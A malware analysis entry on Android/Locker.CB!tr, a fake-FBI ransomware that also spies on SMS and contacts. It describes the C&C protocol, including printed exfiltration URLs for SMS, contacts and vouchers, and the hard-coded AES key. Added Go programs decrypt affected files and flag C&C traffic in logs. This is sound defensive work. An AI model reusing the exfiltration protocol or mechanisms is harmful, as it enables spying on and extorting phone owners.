Android/Locker.CB!tr

Analysis

Android/Locker.CB!tr is a ransomware and spyware which targets Android mobile devices. It scares the victim by saying it has detected suspicious unlawful activity on the phone and claims to have reported the issue to the FBI. The victim is expected to pay $500 as a fine. In most cases, the victim's smartphone is locked on those false allegations and can no longer be used.
The malware also communicates with a remote C&C and, depending on the commands it receives from it, may also perform other actions: encrypt the contents of the SD card, send SMS messages, forward any incoming SMS, forward the list of contacts.
Finally, the malware tries to propagate by sending SMS messages to the victim's contacts; the link in each SMS leads to a copy of the malware.

Technical Details


The malware comes packaged as com.adobe.videoprayer and mimics a video player.
  • Figure 1. Malware's icon, faking a video player.

When the application is launched, it displays web pages that scare the victim.
  • Figure 2. The malware's page scares the end-user by claiming that suspicious files were found on his/her device.
For credibility, the web pages:
  • Appear to have come from the Department of Justice / FBI.
  • Include text of US laws.
  • Claim that the information has been uploaded to FBI servers.
  • Display real content from the device: IMEI, phone number, model and IP address, device browser history.
  • Display a picture of the victim. This picture is taken by taking a shot of the person with the smartphone's front camera - presumably the smartphone's owner.
  • Show fake pornographic images. The image is contained in the malware's resources.
  • Illustrate their threats with images of people being handcuffed and arrested by the police.
The display of those screens is handled by the Locker service, which is started as soon as the malware is launched.
The service is named 'Locker' because a regular end-user finds it very hard to navigate away from those pages. Consequently, the victim cannot use his/her phone and feels there is no other solution than to pay the ransom.
Experienced end-users can try to kill the service:
  1. Get a shell on the infected device.

  2. Issue:
    am stopservice com.adobe.videoprayer/.LockerService
    
    The locking pages should disappear.

  3. Finally, the malware can be uninstalled:
    pm uninstall com.adobe.videoprayer
    

The locking mechanism also consists of a receiver, named StartLockServiceAtBootReceiver, which ensures the locking service is started as soon as the device boots.
Meanwhile, the Checker service is also started at startup. This service will:
  • Every minute, contact the remote C&C:
    http://{Removed}.104:12449/pha?android_version=[VersionRelease]&id=[Identifier]&phone_number=[PhoneNumber]&client_version=1.03&imei=[IMEI]&name=[Model]
    
    where [Identifier] corresponds to the Settings.Secure.ANDROID_ID (a hex string which identifies the device), [PhoneNumber] is the infected phone's number, [IMEI] is the infected phone's IMEI, client_version corresponds to the malware's version number, [VersionRelease] corresponds to Build.VERSION.RELEASE, and [Model] corresponds to Build.MODEL.
    The C&C responds to this request with a JSON object containing an SMS template:
    {"sms_template": "OMG!!! Guess who's on a video here, you will not believe it!!! Download this application and look on first page http://{Removed}"}
    

    Then, the malware asks for commands:
    http://{Removed}.104:12449/gac/IDENTIFIER
    
    and the C&C responds with a JSON object which contains a command identifier:
    {"id": "3"}
    
    We will detail the commands later on.
    The malware confirms it received the command:
    http://{Removed}4:12449/eaction/IDENTIFIER
    
    to which the C&C responds: "Action execute".
    The malware then performs the command.

  • Every 30 minutes (a delay set in the code by ContactSmsDelayMillis in res/values/integers.xml), it tries to propagate by sending SMS messages to some of the victim's contacts. The number of contacts to message is set in the code by a variable named ContactCount (see res/values/integers.xml): the malware builds a list of the contacts on the smartphone, sends the SMS to the first ContactCount entries, then to the next ContactCount entries the next time, and so on. The SMS body is the SMS template sent by the C&C server, for example the one mentioned earlier. The link in the SMS leads to downloading a sample of this malware (Android/Locker.CB!tr).

  • If an incoming SMS is received and the catchSms option (in the preferences file) is set, the SMS's originating phone number, date and time, and body are forwarded in an HTTP request to the C&C as:
    hxxp://{Removed}.104:12449/scs/IDENTIFIER...
    
    Precisely, the receiver IncomingSms is notified of the arrival of a new SMS message (before other receivers because of its high priority). It sends an "incoming_sms" intent to the Checker service, which issues a ReceivedSmsRequest.
The malware is able to process the following commands (command ID, action name, behaviour):
  • 0, ACTION_GET_SMS: getAndSendSmsData() sends all SMS messages to
    hxxp://{Removed}.104:12449/ssms/IDENTIFIER
    where each SMS message (originating number, date and body) is sent as a JSON object.
  • 1, ACTION_GET_CONTACTS: getAndSendContactData() sends the list of all contacts on the phone to
    hxxp://{Removed}.104:12449/sc/IDENTIFIER
    where the contacts (name and phone number) are sent as JSON objects.
  • 2, ACTION_CRYPT_DATA: the malware encrypts the SD card's Android directory.
  • 3, ACTION_LOCK_PHONE: the malware makes sure the scare pages are displayed and the phone is locked on those pages.
  • 5, ACTION_UNLOCK_PHONE: the malware stops the Locker service and the scare pages disappear. However, in that case the malware switches to the Catch Sms mode, in which incoming SMS messages are forwarded to the C&C.
  • 6, ACTION_CODE_INCORRECT: an alert window is displayed with the message 'Entered code is incorrect' to notify the victim that the voucher code entered for payment is not valid.
  • 7, ACTION_CATCH_SMS: setCatchSms sets the CatchSms entry in the preferences file to true; as a consequence, all incoming SMS messages are then forwarded to the C&C.
  • 8, ACTION_SEND_SMS: doSendSms sends an SMS to a given phone number. The malware sends a request to the C&C:
    hxxp://{Removed}.104:12449/gsfs/IDENTIFIER
    The C&C responds with a JSON object containing a phone number and an SMS body, and the infected device sends an SMS with that body to that phone number.
  • 9, ACTION_STOP_CATCH_SMS: sets CatchSms to false, which ends the spying on incoming SMS messages.
  • 10, ACTION_DECRYPT_DATA: decrypts the SD card's Android directory.
  • -1, ACTION_UNKNOWN: no action to perform.

The malware's encryption algorithm is the following.
  • First, the malware derives an AES key from the hard-coded string "ThisIsKey". The derivation algorithm is PBKDF2 with HMAC-SHA1, 65536 iterations and the hard-coded salt "ThisIsSalt": HMAC-SHA1 is keyed with the key string and applied to the salt, its output is fed back into HMAC-SHA1 65536 times, and the intermediate outputs are XORed together to form the key bytes.

  • The resulting bytes are used as an AES key to encrypt the Android directory of the SD card. The encryption is performed recursively on every file and directory in Android.

  • The decryption follows the same process: the string "ThisIsKey" is derived into the same key, and the resulting bytes are used to decrypt the directory. As the key is generated from a hard-coded string and salt, it is 'static' and common to all instances of this particular malware. A victim whose SD card got encrypted can therefore implement the decryption process and retrieve his/her data.
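Because the key material is fixed, the derivation can be reproduced offline. The Go program below is an added example written for this page, not code from the sample or from Fortinet: it implements PBKDF2-HMAC-SHA1 on top of the standard library's HMAC (so the 65536-iteration derivation can be checked against the published RFC 6070 test vectors), derives the family's key from "ThisIsKey" and "ThisIsSalt", and walks a directory tree decrypting every file the way the malware walks it. The analysis does not state the key length, the AES mode or how the IV is stored, so the 128-bit key, CBC mode with PKCS#7 padding and a 16-byte IV prepended to each file are assumptions; confirm them against the sample's Cipher.getInstance() string before running it on a real SD card image.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"errors"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
)

// Values the analysis reports: hard-coded password and salt, PBKDF2-HMAC-SHA1, 65536 rounds.
const (
	hardcodedKey  = "ThisIsKey"
	hardcodedSalt = "ThisIsSalt"
	iterations    = 65536
	keyLen        = 16 // assumption: 128-bit AES key; the analysis does not give the length
)

// pbkdf2SHA1 is PBKDF2 (RFC 8018) with HMAC-SHA1 as the PRF: HMAC is keyed with the
// password, applied to salt||counter, chained iter times, and every intermediate
// output is XORed into the key block.
func pbkdf2SHA1(password, salt []byte, iter, dkLen int) []byte {
	prf := hmac.New(sha1.New, password)
	var dk []byte
	for block := 1; len(dk) < dkLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:dkLen]
}

// StaticKey derives the key shared by every sample of this family.
func StaticKey() []byte {
	return pbkdf2SHA1([]byte(hardcodedKey), []byte(hardcodedSalt), iterations, keyLen)
}

// Assumption: AES-CBC, PKCS#7 padding, random 16-byte IV stored in front of the
// ciphertext. The analysis only says "AES"; adjust to the sample's cipher mode.
func encryptBytes(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte(nil), plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, aes.BlockSize+len(padded))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], padded)
	return out, nil
}

func decryptBytes(key, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(data) < 2*aes.BlockSize || len(data)%aes.BlockSize != 0 {
		return nil, errors.New("not an IV followed by whole AES blocks")
	}
	pt := make([]byte, len(data)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, data[:aes.BlockSize]).CryptBlocks(pt, data[aes.BlockSize:])
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad padding: wrong key or cipher mode")
	}
	return pt[:len(pt)-pad], nil
}

// DecryptTree walks root recursively, as the malware does, and rewrites each regular
// file with its plaintext. Work on a copy of the SD card: files that do not decrypt
// cleanly are reported on stderr and left untouched.
func DecryptTree(root string, key []byte) (int, error) {
	count := 0
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return err
		}
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		pt, err := decryptBytes(key, data)
		if err != nil {
			fmt.Fprintf(os.Stderr, "skip %s: %v\n", path, err)
			return nil
		}
		if err := os.WriteFile(path, pt, 0o600); err != nil {
			return err
		}
		count++
		return nil
	})
	return count, err
}

func main() {
	key := StaticKey()
	fmt.Printf("derived AES key: %x\n", key)
	if len(os.Args) > 1 { // e.g. a copy of the SD card's Android directory
		n, err := DecryptTree(os.Args[1], key)
		fmt.Printf("decrypted %d files, err=%v\n", n, err)
	}
}
```

Run it with the path of a copied Android directory as the only argument; without an argument it just prints the derived key, which is the same on every run and every device because nothing device-specific enters the derivation.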

If the victim decides to pay, the voucher code the victim enters is sent to the C&C:
http://{Removed}104:12449/cpm/IDENTIFIER?payment_check=CODE&payment_type=29
There is obviously no guarantee the attacker will unlock and/or decrypt the files on the device.
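The beacon, the command endpoints (/gac, /eaction, /scs, /ssms, /sc, /gsfs) and the payment URL above are all plain HTTP, so they appear in proxy or gateway logs. The Go program below is an added example for this page, not Fortinet's detection logic: it classifies request URLs by those path shapes, treats only the /pha beacon carrying the imei and client_version parameters as a strong indicator on its own, and keeps the short-path stages only when they go to a host that has already received a beacon, so an unrelated site whose path happens to start with /sc/ is not flagged. The sample log lines, the 203.0.113.10 address and the device identifier are constructed; the port 12449 and the parameter names are the ones reported in the analysis.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// C&C endpoints named in the analysis, keyed by the first path segment.
var stageByPath = map[string]string{
	"pha":     "beacon (device fingerprint, SMS template fetch)",
	"gac":     "get command",
	"eaction": "acknowledge command",
	"scs":     "forward intercepted SMS",
	"ssms":    "dump all SMS (ACTION_GET_SMS)",
	"sc":      "dump contacts (ACTION_GET_CONTACTS)",
	"gsfs":    "fetch outbound SMS number/body (ACTION_SEND_SMS)",
	"cpm":     "submit payment voucher code",
}

// Hit is one log line attributed to this family.
type Hit struct {
	Line     string
	Host     string // host:port the request went to
	Stage    string
	DeviceID string // the IDENTIFIER the malware uses: path suffix, or id= on the beacon
}

// Classify matches one URL against the endpoint shapes and extracts the device identifier.
func Classify(line, raw string) (Hit, bool) {
	u, err := url.Parse(raw)
	if err != nil {
		return Hit{}, false
	}
	segs := strings.SplitN(strings.TrimPrefix(u.Path, "/"), "/", 2)
	stage, ok := stageByPath[segs[0]]
	if !ok {
		return Hit{}, false
	}
	h := Hit{Line: line, Host: u.Host, Stage: stage}
	if segs[0] == "pha" {
		// The beacon carries the fixed client_version and the IMEI; require both.
		q := u.Query()
		if q.Get("imei") == "" || q.Get("client_version") == "" {
			return Hit{}, false
		}
		h.DeviceID = q.Get("id")
		return h, true
	}
	if len(segs) < 2 || segs[1] == "" {
		return Hit{}, false
	}
	h.DeviceID = segs[1]
	return h, true
}

// ScanLog takes proxy lines whose last field is the URL. Only the /pha beacon is
// distinctive by itself; short paths such as /sc/ collide with ordinary web sites,
// so the other stages are kept only for hosts that have received a beacon.
func ScanLog(lines []string) []Hit {
	var candidates []Hit
	cncHosts := map[string]bool{}
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) == 0 {
			continue
		}
		h, ok := Classify(line, fields[len(fields)-1])
		if !ok {
			continue
		}
		if strings.HasPrefix(h.Stage, "beacon") {
			cncHosts[h.Host] = true
		}
		candidates = append(candidates, h)
	}
	var hits []Hit
	for _, h := range candidates {
		if cncHosts[h.Host] {
			hits = append(hits, h)
		}
	}
	return hits
}

// StagesByDevice groups the stages seen per infected device, in log order.
func StagesByDevice(hits []Hit) map[string][]string {
	out := map[string][]string{}
	for _, h := range hits {
		out[h.DeviceID] = append(out[h.DeviceID], h.Stage)
	}
	return out
}

// Constructed sample log: 203.0.113.10 is a documentation address; the fourth line is
// a benign request whose path merely resembles the contacts endpoint.
var sampleLog = []string{
	"2022-01-12T10:00:01Z 10.0.0.5 GET http://203.0.113.10:12449/pha?android_version=4.4.2&id=3f9c1a2b7d6e5f40&phone_number=%2B15555550100&client_version=1.03&imei=123456789012345&name=Nexus5",
	"2022-01-12T10:00:02Z 10.0.0.5 GET http://203.0.113.10:12449/gac/3f9c1a2b7d6e5f40",
	"2022-01-12T10:00:03Z 10.0.0.5 GET http://203.0.113.10:12449/eaction/3f9c1a2b7d6e5f40",
	"2022-01-12T10:00:10Z 10.0.0.7 GET http://www.example.com/sc/latest",
	"2022-01-12T10:05:00Z 10.0.0.5 POST http://203.0.113.10:12449/scs/3f9c1a2b7d6e5f40",
	"2022-01-12T11:00:00Z 10.0.0.5 GET http://203.0.113.10:12449/cpm/3f9c1a2b7d6e5f40?payment_check=VOUCHER&payment_type=29",
}

func main() {
	for id, stages := range StagesByDevice(ScanLog(sampleLog)) {
		fmt.Printf("device %s: %s\n", id, strings.Join(stages, " -> "))
	}
}
```

Grouping by the IDENTIFIER is what makes the output actionable: a single device that beacons, fetches a command, acknowledges it and then starts posting to /scs/ has reached the SMS-interception stage, and a hit on /cpm/ means the victim has already typed in a voucher code.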
Finally, it is interesting to note that the Checker service is designed to keep running in the background even when the smartphone is locked or idle: it acquires a PARTIAL_WAKE_LOCK, which keeps the CPU running while the screen stays off or dimmed, making the activity less noticeable. End users may however notice a battery drain, as the malware continuously sends requests to the C&C.
The malware installs the following files on the device:
  • ./assets/tab2.html
  • ./assets/320x320_stamp and sign.png
  • ./assets/accordion_open.png
  • ./assets/tab1.html
  • ./assets/accordion.js
  • ./assets/320x320_prism-logo.png
  • ./assets/tab4.html
  • ./assets/accordion_closed.png
  • ./assets/accordion.css
  • ./META-INF/CERT.RSA
  • ./META-INF/CERT.SF
  • ./META-INF/MANIFEST.MF
  • ./resources.arsc
  • ./res/drawable-xxxhdpi-v4/ic_clipboard.png
  • ./res/drawable-xxxhdpi-v4/ic_info.png
  • ./res/drawable-xxxhdpi-v4/ic_money.png
  • ./res/drawable-xxxhdpi-v4/ic_justice.png
  • ./res/drawable-xxxhdpi-v4/ic_home.png
  • ./res/layout/tab1.xml
  • ./res/layout/page4.xml
  • ./res/layout/page3.xml
  • ./res/layout/history_item.xml
  • ./res/layout/main_screen.xml
  • ./res/layout/activity_main2.xml
  • ./res/layout/page2.xml
  • ./res/layout/page5.xml
  • ./res/layout/page1.xml
  • ./res/layout/tab4.xml
  • ./res/layout/tab3.xml
  • ./res/layout/page4_header.xml
  • ./res/layout/activity_main.xml
  • ./res/layout/tab2.xml
  • ./res/layout/tab5.xml
  • ./res/drawable-hdpi-v4/p5.png
  • ./res/drawable-hdpi-v4/p2.png
  • ./res/drawable-hdpi-v4/paypal_logo.png
  • ./res/drawable-hdpi-v4/p3.png
  • ./res/drawable-hdpi-v4/p4.png
  • ./res/drawable-hdpi-v4/ic_info.png
  • ./res/drawable-hdpi-v4/logo1.png
  • ./res/drawable-hdpi-v4/bhist.png
  • ./res/drawable-hdpi-v4/ic_launcher.png
  • ./res/drawable-hdpi-v4/paypal_logo_back.png
  • ./res/drawable-hdpi-v4/logo3.png
  • ./res/drawable-hdpi-v4/ic_money.png
  • ./res/drawable-hdpi-v4/ic_justice.png
  • ./res/drawable-hdpi-v4/p1.png
  • ./res/drawable-hdpi-v4/ic_clipboard.png
  • ./res/drawable-hdpi-v4/ic_home.png
  • ./res/drawable-xxhdpi-v4/ic_justice.png
  • ./res/drawable-xxhdpi-v4/ic_money.png
  • ./res/drawable-xxhdpi-v4/ic_info.png
  • ./res/drawable-xxhdpi-v4/ic_launcher.png
  • ./res/drawable-xxhdpi-v4/ic_clipboard.png
  • ./res/drawable-xxhdpi-v4/ic_home.png
  • ./res/xml/device_admin_sample.xml
  • ./res/drawable/s_btn_backspace.xml
  • ./res/drawable/header_bg_tile.xml
  • ./res/drawable/s_btn_pay.xml
  • ./res/drawable/mybackground.xml
  • ./res/drawable/s_btn_number.xml
  • ./res/drawable-xhdpi-v4/image_location.png
  • ./res/drawable-xhdpi-v4/ic_info.png
  • ./res/drawable-xhdpi-v4/input.png
  • ./res/drawable-xhdpi-v4/btn_number.png
  • ./res/drawable-xhdpi-v4/image_flag.png
  • ./res/drawable-xhdpi-v4/ic_launcher.png
  • ./res/drawable-xhdpi-v4/a1.png
  • ./res/drawable-xhdpi-v4/input_field.png
  • ./res/drawable-xhdpi-v4/background.png
  • ./res/drawable-xhdpi-v4/dropdown.png
  • ./res/drawable-xhdpi-v4/ic_justice.png
  • ./res/drawable-xhdpi-v4/btn_pay_pressed.png
  • ./res/drawable-xhdpi-v4/image_jail.png
  • ./res/drawable-xhdpi-v4/btn_number_pressed.png
  • ./res/drawable-xhdpi-v4/btn_send.png
  • ./res/drawable-xhdpi-v4/btn_backspace.png
  • ./res/drawable-xhdpi-v4/btn_backspace_pressed.png
  • ./res/drawable-xhdpi-v4/ic_home.png
  • ./res/drawable-xhdpi-v4/photo_ramka.png
  • ./res/drawable-xhdpi-v4/image_retail.png
  • ./res/drawable-xhdpi-v4/image_lock.png
  • ./res/drawable-xhdpi-v4/ic_clipboard.png
  • ./res/drawable-xhdpi-v4/payment_smallbox.png
  • ./res/drawable-xhdpi-v4/flag_box.png
  • ./res/drawable-xhdpi-v4/payment_bigbox.png
  • ./res/drawable-xhdpi-v4/location_box.png
  • ./res/drawable-xhdpi-v4/btn_pay.png
  • ./res/drawable-xhdpi-v4/image_method_moneypak.png
  • ./res/drawable-xhdpi-v4/back.png
  • ./res/drawable-xhdpi-v4/top_image.png
  • ./res/drawable-xhdpi-v4/ic_money.png
  • ./res/drawable-mdpi-v4/ic_info.png
  • ./res/drawable-mdpi-v4/ic_launcher.png
  • ./res/drawable-mdpi-v4/ic_money.png
  • ./res/drawable-mdpi-v4/ic_home.png
  • ./res/drawable-mdpi-v4/ic_clipboard.png
  • ./res/drawable-mdpi-v4/ic_justice.png
  • ./classes.dex
  • ./AndroidManifest.xml

The malware asks for the following permissions:
  • Allow to send SMS messages.
  • Allow an application to monitor incoming SMS messages, to record or perform processing on them, or to process WAP Push messages.
  • READ_CONTACTS
  • INTERNET
  • READ_HISTORY_BOOKMARKS

Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

  • FortiGate: Extreme
  • FortiClient: Extended
  • FortiMail: Extended
  • FortiSandbox: Extended
  • FortiWeb: Extended
  • Web Application Firewall: Extended
  • FortiIsolator: Extended
  • FortiDeceptor: Extended
  • FortiEDR

Version Updates

Date Version Detail
2022-01-12 89.08643
2022-01-12 89.08642